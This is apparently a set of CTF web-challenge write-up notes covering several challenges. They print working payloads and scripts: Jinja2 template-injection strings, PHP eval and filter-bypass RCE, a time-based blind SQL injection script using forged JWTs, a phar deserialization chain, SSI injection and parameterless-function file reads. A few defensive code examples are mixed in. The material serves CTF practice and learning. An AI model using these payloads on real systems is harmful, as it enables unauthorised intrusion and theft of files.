
CTFhub Challenge Notes

I. [WesternCTF2018]shrine

Not much to say: an SSTI (template injection) challenge. Parentheses () are filtered, but no need to panic. Start injecting; {{29*3}} passes the test.

It turns out to be Jinja2 template injection. The key points are that () is unavailable and that we still need to reach the config, which holds the flag.

A summary of common expressions for reading config:

1. {{config}}
2. {{self.__dict__}}

If config, self and () are all unavailable, you have to reach config's parent, current_app:

1. url_for.__globals__['current_app'].config['FLAG']
2. get_flashed_messages.__globals__['current_app'].config['FLAG']

II. 2017-賽客夏令營-Web-Injection V2.0

A very plain interface, which does nothing to hide how tricky this challenge is.

First, we need to understand that a login can be implemented in two ways:

  1. select * from users where username = {$username} and password = {$password}

  2. $a = select password from users where username = {$username}; $a == {$password}

These are the two common login templates (there seems to be a third, trickier one, but that is in my Yuque notes). Pay attention to the message the server returns.

This challenge returns "user does not exist", which clearly points to the first login pattern (though it is also possible that the challenge only lets admin log in; there is also time-based blind injection guessing, and so on).
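The two login patterns above, written defensively as an added example (not code from the challenge): both use bound parameters, and every failure path returns the same message, so the response no longer tells an outsider which pattern is in use or whether the account exists. The in-memory users table and its rows are constructed.

```python
import hmac
import sqlite3

INVALID = "invalid credentials"   # one message for every failure path

def make_db() -> sqlite3.Connection:
    """Constructed in-memory users table (not from the challenge).  Real
    systems store password hashes; plaintext keeps the example short."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 's3cret'), ('o''brien', 'pw')")
    return conn

def login_pattern_1(conn: sqlite3.Connection, username: str, password: str) -> str:
    """Pattern 1 from the post: a single query checks username AND password.
    Bound parameters keep quotes and keywords in the input as data, not SQL."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password)).fetchone()
    return "ok" if row else INVALID

def login_pattern_2(conn: sqlite3.Connection, username: str, password: str) -> str:
    """Pattern 2 from the post: fetch the stored password, compare in code.
    Unknown user and wrong password both return INVALID, so the reply no
    longer reveals which pattern is used or whether the account exists."""
    row = conn.execute(
        "SELECT password FROM users WHERE username = ?", (username,)).fetchone()
    if row is None:
        return INVALID                       # not "user does not exist"
    stored, given = row[0].encode("utf-8"), password.encode("utf-8")
    return "ok" if hmac.compare_digest(stored, given) else INVALID
```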

III. 第五空間大賽-hate_php

The main point here is bypassing its restrictions on built-in functions.

There are really two bypass methods:

1. Bypass via bitwise NOT or XOR

Functions are then executed through the (phpinfo)() form.

2. String concatenation

$a="syste";$b="m(%27cat%20flag.php%27);";$c=$a.$b;eval($c);

Reference for letterless getshell (length-limited): https://www.cnblogs.com/wangtanzhi/p/12251619.html#autoid-0-1-0

Assorted PHP RCE techniques: https://bbs.ichunqiu.com/thread-59273-1-1.html

A quick script for reference:

import urllib.parse

find = ['G', 'E', 'T', '_']   # no particular order
for i in range(1, 256):
    for j in range(1, 256):
        result = chr(i ^ j)
        if result in find:
            # URL-encode each single byte so the pair can be pasted into a request
            a = urllib.parse.quote(i.to_bytes(1, byteorder='big'))
            b = urllib.parse.quote(j.to_bytes(1, byteorder='big'))
            print("%s:%s^%s" % (result, a, b))

IV. 2020-RCTF-Web-calc

Some letters and non-printable characters are blocked, along with assorted other things. Similar to the challenge above: whatever the filter, just hammer away at it. Taking the bitwise complement would only give a pile of non-printable characters. (Moving on.)

Here there is another small trick:

<?php
$a = ((1/0).(1));
var_dump($a{0});
?>

The character printed is I. This works because PHP is weakly typed: 1/0 becomes INF, concatenating it with 1 gives the string "INF1", and {0} picks its first byte. (Node.js is not this easy, damn.)

<?php
$cmd = "phpinfo"; # command to execute
$fin="";
$tables=
    [
        "9" => "(((9).(0)){0})",
        "8" => "(((8).(0)){0})",
        "7" => "(((7).(0)){0})",
        "6" => "(((6).(0)){0})",
        "5" => "(((5).(0)){0})",
        "4" => "(((4).(0)){0})",
        "3" => "(((3).(0)){0})",
        "2" => "(((2).(0)){0})",
        "1" => "(((1).(0)){0})",
        "0" => "(((0).(0)){0})",
        "~" => "((((0).(0)){0})|(((0/0).(0)){0}))",
        "}" => "((((4).(0)){0})|(((1/0).(0)){0}))",
        "|" => "((((4).(0)){0})|((((0/0).(0)){0})&(((1/0).(0)){0})))",
        "{" => "((((2).(0)){0})|(((1/0).(0)){0}))",
        "z" => "((((2).(0)){0})|((((0/0).(0)){0})&(((1/0).(0)){0})))",
        "y" => "((((0).(0)){0})|(((1/0).(0)){0}))",
        "x" => "((((0).(0)){0})|((((0/0).(0)){0})&(((1/0).(0)){0})))",
        "w" => "((((1).(0)){0})|(((1/0).(0)){2}))",
        "v" => "((((0).(0)){0})|(((1/0).(0)){2}))",
        "u" => "((((4).(0)){0})|(((0/0).(0)){1}))",
        "t" => "((((4).(0)){0})|((((0/0).(0)){0})&(((0/0).(0)){1})))",
        "s" => "((((2).(0)){0})|(((0/0).(0)){1}))",
        "r" => "((((2).(0)){0})|((((0/0).(0)){0})&(((0/0).(0)){1})))",
        "q" => "((((0).(0)){0})|(((0/0).(0)){1}))",
        "p" => "((((0).(0)){0})|((((0/0).(0)){0})&(((0/0).(0)){1})))",
        "o" => "((((0/0).(0)){0})|(((-1).(1)){0}))",
        "n" => "((((0/0).(0)){0})|((((4).(0)){0})&(((-1).(1)){0})))",
        "m" => "((((0/0).(0)){1})|(((-1).(1)){0}))",
        "l" => "(((((0).(0)){0})|(((0/0).(0)){0}))&((((0/0).(0)){1})|(((-1).(1)){0})))",
        "k" => "(((((2).(0)){0})|(((1/0).(0)){0}))&((((0/0).(0)){0})|(((-1).(1)){0})))",
        "j" => "(((((0).(0)){0})|(((0/0).(0)){0}))&(((((2).(0)){0})|(((1/0).(0)){0}))&((((0/0).(0)){0})|(((-1).(1)){0}))))",
        "i" => "((((0/0).(0)){1})|((((8).(0)){0})&(((-1).(1)){0})))",
        "h" => "(((((8).(0)){0})&(((-1).(1)){0}))|((((0/0).(0)){0})&(((0/0).(0)){1})))",
        "g" => "((((1/0).(0)){2})|((((1).(0)){0})&(((-1).(1)){0})))",
        "f" => "((((1/0).(0)){2})|((((4).(0)){0})&(((-1).(1)){0})))",
        "e" => "((((0/0).(0)){1})|((((4).(0)){0})&(((-1).(1)){0})))",
        "d" => "(((((0).(0)){0})|(((1/0).(0)){2}))&((((0/0).(0)){1})|(((-1).(1)){0})))",
        "c" => "(((((2).(0)){0})|(((0/0).(0)){1}))&((((0/0).(0)){0})|(((-1).(1)){0})))",
        "b" => "(((((0).(0)){0})|(((0/0).(0)){0}))&(((((2).(0)){0})|(((0/0).(0)){1}))&((((0/0).(0)){0})|(((-1).(1)){0}))))",
        "a" => "((((0/0).(0)){1})|((((1).(0)){0})&(((-1).(1)){0})))",
        "`" => "(((((0).(0)){0})|(((0/0).(0)){0}))&((((0/0).(0)){1})|((((1).(0)){0})&(((-1).(1)){0}))))",
        "O" => "((((0/0).(0)){0})|(((0/0).(0)){1}))",
        "N" => "(((0/0).(0)){0})",
        "M" => "(((((4).(0)){0})|(((1/0).(0)){0}))&((((0/0).(0)){0})|(((0/0).(0)){1})))",
        "L" => "((((0/0).(0)){0})&((((4).(0)){0})|(((1/0).(0)){0})))",
        "K" => "(((((2).(0)){0})|(((1/0).(0)){0}))&((((0/0).(0)){0})|(((0/0).(0)){1})))",
        "J" => "((((0/0).(0)){0})&((((2).(0)){0})|(((1/0).(0)){0})))",
        "I" => "(((1/0).(0)){0})",
        "H" => "((((0/0).(0)){0})&(((1/0).(0)){0}))",
        "G" => "((((0/0).(0)){1})|(((1/0).(0)){2}))",
        "F" => "(((1/0).(0)){2})",
        "E" => "(((((4).(0)){0})|(((0/0).(0)){1}))&((((0/0).(0)){0})|(((0/0).(0)){1})))",
        "D" => "((((0/0).(0)){0})&((((4).(0)){0})|(((0/0).(0)){1})))",
        "C" => "(((((2).(0)){0})|(((0/0).(0)){1}))&((((0/0).(0)){0})|(((0/0).(0)){1})))",
        "B" => "((((0/0).(0)){0})&((((2).(0)){0})|(((0/0).(0)){1})))",
        "A" => "(((0/0).(0)){1})",
        "@" => "((((0/0).(0)){0})&(((0/0).(0)){1}))",
        "?" => "((((2).(0)){0})|(((-1).(1)){0}))",
        ">" => "((((6).(0)){0})|(((8).(0)){0}))",
        "=" => "((((0).(0)){0})|(((-1).(1)){0}))",
        "<" => "((((4).(0)){0})|(((8).(0)){0}))",
        ";" => "((((2).(0)){0})|(((9).(0)){0}))",
        ":" => "((((2).(0)){0})|(((8).(0)){0}))",
        "/" => "(((((2).(0)){0})|(((-1).(1)){0}))&((((0/0).(0)){0})|(((-1).(1)){0})))",
        "." => "(((((6).(0)){0})|(((8).(0)){0}))&((((0/0).(0)){0})|(((-1).(1)){0})))",
        "-" => "(((-1).(1)){0})",
        "," => "((((-1).(1)){0})&((((0).(0)){0})|(((0/0).(0)){0})))",
        "+" => "(((((2).(0)){0})|(((9).(0)){0}))&((((0/0).(0)){0})|(((-1).(1)){0})))",
        "*" => "(((((2).(0)){0})|(((8).(0)){0}))&((((0/0).(0)){0})|(((-1).(1)){0})))",
        ")" => "((((9).(0)){0})&(((-1).(1)){0}))",
        "(" => "((((8).(0)){0})&(((-1).(1)){0}))",
        "'" => "((((7).(0)){0})&((((0/0).(0)){0})|(((-1).(1)){0})))",
        "&" => "((((6).(0)){0})&((((0/0).(0)){0})|(((-1).(1)){0})))",
        "%" => "((((5).(0)){0})&(((-1).(1)){0}))",
        "$" => "((((4).(0)){0})&(((-1).(1)){0}))",
        "#" => "((((3).(0)){0})&((((0/0).(0)){0})|(((-1).(1)){0})))",
        '"' => "((((2).(0)){0})&((((0/0).(0)){0})|(((-1).(1)){0})))",
        "!" => "((((1).(0)){0})&(((-1).(1)){0}))"
    ];
for($i=0;$i<strlen($cmd);$i++) {
    $fin = $fin.$tables[$cmd[$i]].'.';
}
echo substr($fin,0,strlen($fin)-1);

Then, with the (phpinfo)() form from above, the bypass is complete.

Small trick: nmap can read a file directly through its -iL option.
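To see why the table works, here is an added example (not the challenge author's code) that emulates the PHP 7 string semantics involved and recomputes a few rows. It assumes PHP 7, where 1/0 is INF and 0/0 is NAN with only a warning; PHP 8 throws DivisionByZeroError there and has dropped the {} string-offset syntax, so this construction is PHP-7-only.

```python
import math

# PHP 7 semantics assumed (added example, not the challenge code):
# 1/0 evaluates to INF (with a warning) and 0/0 to NAN; "." concatenates;
# $s{n} indexes a string; "|" and "&" on two strings operate byte by byte.
# On PHP 8 none of this holds: 1/0 throws DivisionByZeroError and the {}
# offset syntax has been removed, so the table above is PHP-7-only.

def php_str(value) -> str:
    """PHP's string conversion for the numeric values the table uses."""
    if isinstance(value, float):
        if math.isnan(value):
            return "NAN"
        if math.isinf(value):
            return "INF" if value > 0 else "-INF"
    return str(value)

def php_or(a: str, b: str) -> str:
    """PHP `$a | $b` on strings: bytewise OR, padded to the longer operand."""
    if len(a) < len(b):
        a, b = b, a
    return "".join(chr(ord(x) | ord(y)) for x, y in zip(a, b)) + a[len(b):]

def php_and(a: str, b: str) -> str:
    """PHP `$a & $b` on strings: bytewise AND, cut to the shorter operand."""
    return "".join(chr(ord(x) & ord(y)) for x, y in zip(a, b))

# The only letters reachable without typing any: (1/0).(0) -> "INF0",
# (0/0).(0) -> "NAN0", (-1).(1) -> "-11"; the {n} offset picks one byte.
I = (php_str(float("inf")) + "0")[0]   # "I"
F = (php_str(float("inf")) + "0")[2]   # "F"
N = (php_str(float("nan")) + "0")[0]   # "N"
A = (php_str(float("nan")) + "0")[1]   # "A"
MINUS = (php_str(-1) + "1")[0]         # "-"

def rebuild_entries() -> dict:
    """Recompute a few rows of the table above from those primitives;
    every value should equal its key."""
    return {
        "~": php_or("0", N),                  # 0x30 | 0x4E = 0x7E
        "}": php_or("4", I),                  # 0x34 | 0x49 = 0x7D
        "|": php_or("4", php_and(N, I)),      # N & I = 'H' (0x48); 0x34 | 0x48
        "p": php_or("0", php_and(N, A)),      # N & A = '@' (0x40); 0x30 | 0x40
        "a": php_or(A, php_and("1", MINUS)),  # '1' & '-' = '!' (0x21); 'A' | '!'
        "(": php_and("8", MINUS),             # 0x38 & 0x2D = 0x28
        "G": php_or(A, F),                    # 0x41 | 0x46 = 0x47
    }
```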

V. js_on

Weak-password login.

This key forced me to take a look at my JWT.

Then:

My first reaction here was actually XSS or SSTI injection.

It turned out to be blind injection; I really did not expect this challenge to take that route. (Thinking about the open registration endpoint, it should be injection; it also filters spaces, select and the like. Tricky.)

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# CTF_2020 網鼎杯 玄武組 Web challenge: js_on


import requests, jwt, time

url = 'http://f3837049ec024ba1a59616045d15741a29b3253216334191.cloudgame1.ichunqiu.com/'
key = 'xRt*YMDqyCCxYxi9a@LgcGpnmM2X8i&6'

flag = ''

for i1 in range(1, 50):            # character position in the file
    for i2 in range(33, 127):      # candidate printable byte value
        time_start = time.time()

        # build the payload, sign it as a JWT with the leaked key, send it in the token cookie
        user = '1234\'or/**/1=if(ord(substr((sele<>ct/**/load_file(\'//flag\')),' + str(i1) + ',1))=' + str(i2) + ',sl<>eep(5),1)#'
        encoded_jwt = jwt.encode({'user': user, 'news': '1234'}, key, algorithm='HS256')
        if isinstance(encoded_jwt, bytes):   # PyJWT < 2 returns bytes
            encoded_jwt = encoded_jwt.decode()
        res = requests.get(url, cookies={'token': encoded_jwt})

        if time.time() - time_start > 5:     # sleep(5) fired, so the guess was right
            flag += chr(i2)
            print(flag)
            break

VI. picdown

A download page almost certainly means file inclusion. A few commonly used directories follow (learning Linux is great):

../../../../../proc/self/cmdline shows the command line of the currently running process

Commonly used /proc entries: https://blog.csdn.net/shenhuxi_yu/article/details/79697792

/proc/pid/fd/ contains a link for every file the process has opened (open() opened the file and created the file descriptor).

After that it is just mindlessly assembling commands.

VII. National competition: love_math

The key is the hex2bin function; the rest is creating new variables and similar operations.

VIII. National competition: CISCN-2019-華北賽區-Day2-Web-Web1

Using parentheses to bypass the space filter; basic stuff.

IX. CISCN-2019-華北賽區-Day1-Web-Web1

File download is the entry point; after finding the source-code leak, retrieve the source and audit the code.

Audit the code and build the POP chain; naturally this depends on those fancy stream wrappers. The slickest upload-and-bypass relies on the phar:// wrapper: extension and handling do not matter as long as the wrapper is usable. (From the 巔峰極客 writeup.)

Link: https://xz.aliyun.com/t/2715

Script below (sort out the preceding deserialization yourself):

<?php

class User
{
    public $id;
    public $age=null;
    public $nickname=null;
    public $backup;
    public function __construct()
    {
        $this->nickname = new Reader();
        $this->backup = "/flag";
    }
}
class dbCtrl
{
    public $token;
    public function __construct()
    {
        $this->token = new User;
    }
}

class Reader{
    public $filename;
    public $result;
}

$y1ng = new dbCtrl();

$phar = new Phar("web1.phar");
$phar->startBuffering();
$phar->setStub("GIF89a"."<?php __HALT_COMPILER(); ?>");
$phar->setMetadata($y1ng); // the serialized object is carried in the metadata
$phar->addFromString("test.txt", "test");
$phar->stopBuffering();

@rename("web1.phar", "y1ng.gif");

Then reference the archive as: compress.zlib://phar://y1ng.gif/test.txt

Chaining wrappers like this to bypass the protocol restriction: isn't that nice?

This one is a bit of an illusion; there are a few points (the original challenge, which I have forgotten again...):

1. Data in the cookie does not need to be URL-encoded for transmission

2. SSI injection

<?php
    ob_start();
    function get_hash(){
        $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-';
        $random = $chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)];//Random 5 times
        $content = uniqid().$random;
        return sha1($content); 
    }
    header("Content-Type: text/html;charset=utf-8");
    ***
    if(isset($_POST['username']) and $_POST['username'] != '' )
    {
        $admin = '6d0bc1';
        if ( $admin == substr(md5($_POST['password']),0,6)) {
            echo "<script>alert('[+] Welcome to manage system')</script>";
            $file_shtml = "public/".get_hash().".shtml";
            $shtml = fopen($file_shtml, "w") or die("Unable to open file!");
            $text = '
            ***
            ***
            <h1>Hello,'.$_POST['username'].'</h1>
            ***
            ***';
            fwrite($shtml,$text);
            fclose($shtml);
            ***
            echo "[!] Header  error ...";
        } else {
            echo "<script>alert('[!] Failed')</script>";
        }
    }else
    {
        ***
    }
    ***
?>

A file write plus the .shtml signature basically means SSI injection.

SSTI, XSS, SSI and similar injections.
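As an added defensive example (not the challenge source), the same write of $_POST['username'] into a .shtml file, done in Python with the value HTML-escaped first, plus a check that flags SSI directive syntax in the input so it can be logged; the username and the temporary directory are constructed.

```python
import html
import re
import tempfile
from pathlib import Path

# Added example, not the challenge source.  The snippet above writes
# $_POST['username'] verbatim into a .shtml file; whatever the server
# parses as an SSI directive in that file runs on the next request.
# Shown here: escape before writing, and flag directive syntax in input.

# Apache-style SSI directive opener: "<!--#" followed by a directive name.
SSI_DIRECTIVE = re.compile(r"<!--\s*#\s*[a-z]+", re.IGNORECASE)

def looks_like_ssi(value: str) -> bool:
    """Detection hook: log or alert when input carries an SSI directive."""
    return SSI_DIRECTIVE.search(value) is not None

def render_greeting(username: str) -> str:
    """Hardened $text from the snippet: HTML-escaping turns '<' into '&lt;',
    so no '<!--#' opener can reach the file."""
    return "<h1>Hello,%s</h1>" % html.escape(username, quote=True)

def write_page(public_dir: Path, name: str, username: str) -> Path:
    """Mirror of the fopen/fwrite in the snippet, using the escaped body."""
    target = public_dir / (name + ".shtml")
    target.write_text(render_greeting(username), encoding="utf-8")
    return target

def page_is_inert(path: Path) -> bool:
    """Post-write check: the saved .shtml must contain no SSI directive."""
    return not looks_like_ssi(path.read_text(encoding="utf-8"))

def demo_roundtrip(username: str) -> bool:
    """Write the page for a constructed username into a temp dir and report
    whether the result is inert, even when the input itself was flagged."""
    with tempfile.TemporaryDirectory() as d:
        page = write_page(Path(d), "constructed-hash", username)
        return page_is_inert(page)
```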

XI. ByteCTF 2019 - WEB - Boring-Code

Bypassing parse_url: https://www.jianshu.com/p/80ce73919edb

Then it is parameterless function chaining all the way.

A few payloads (these read the parent directory):

Build ASCII 46 to obtain the character ".":

echo(readfile(end(scandir(chr(pos(localtime(time(chdir(next(scandir(chr(ceil(sinh(cosh(tan(floor(sqrt(floor(phpversion())))))))))))))))))));
echo(readfile(end(scandir(chr(pos(localtime(time(chdir(next(scandir(pos(localeconv()))))))))))));

exp:

import requests
import time
localtime = time.asctime( time.localtime(time.time()) )
url='http://challenge-72b9ac351e12c91b.sandbox.ctfhub.com:10080/code/'
while 1:
    response=requests.post(url,data={'url':'compress.zlib://data:@baidu.com/baidu.com?,echo(readfile(end(scandir(chr(pos(localtime(time(chdir(next(scandir(pos(localeconv()))))))))))));'}).text
    if 'ctfhub' in response:
        print('flag:'+response+"\n",localtime)
        break